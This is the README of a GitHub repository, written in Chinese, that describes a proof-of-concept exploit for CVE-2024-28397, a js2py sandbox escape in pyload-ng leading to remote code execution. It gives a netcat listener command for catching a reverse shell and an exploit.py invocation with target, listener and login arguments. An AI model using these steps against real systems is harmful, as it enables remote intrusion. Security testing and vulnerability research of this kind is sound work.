ExtremeUday/Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py-
GitHub: ExtremeUday/Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py-
针对 CVE-2024-28397 的 PoC exploit,利用 pyload-ng 中 js2py 沙盒逃逸实现远程代码执行。
Stars: 0 | Forks: 0
# 远程代码执行 – CVE-2024-28397 (pyload-ng / js2py)
本仓库包含一个针对 **CVE-2024-28397** 的**概念验证** exploit,该漏洞是由于 **pyload-ng** 不安全地使用了 **js2py** 而导致的远程代码执行漏洞。
## 漏洞详情
- **CVE ID:** [CVE-2024-28397](https://nvd.nist.gov/vuln/detail/CVE-2024-28397)
- **组件:** `pyload-ng` 中的 `js2py`
- **影响:** 远程代码执行 (RCE)
- **攻击向量:** 恶意的 JS payload 逃逸出 js2py 沙盒并执行任意系统命令。
## 环境要求与设置
你需要 **Python 3.x**、`requests` 库以及用于接收反弹 shell 的 `netcat`。
- 目标 → 存在漏洞的 pyload-ng 实例,且其 /run_code 端点可被访问
## 监听端 → 在运行 exploit 之前启动:
**nc -lvnp 4444**
## 使用方法:
**python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123**
## 示例输出:
- [+] 注册成功!
- [+] 登录成功
- [+] exploit 执行成功
标签:CISA项目, Python, RCE, 威胁模拟, 安全, 无后门, 超时处理, 逆向工具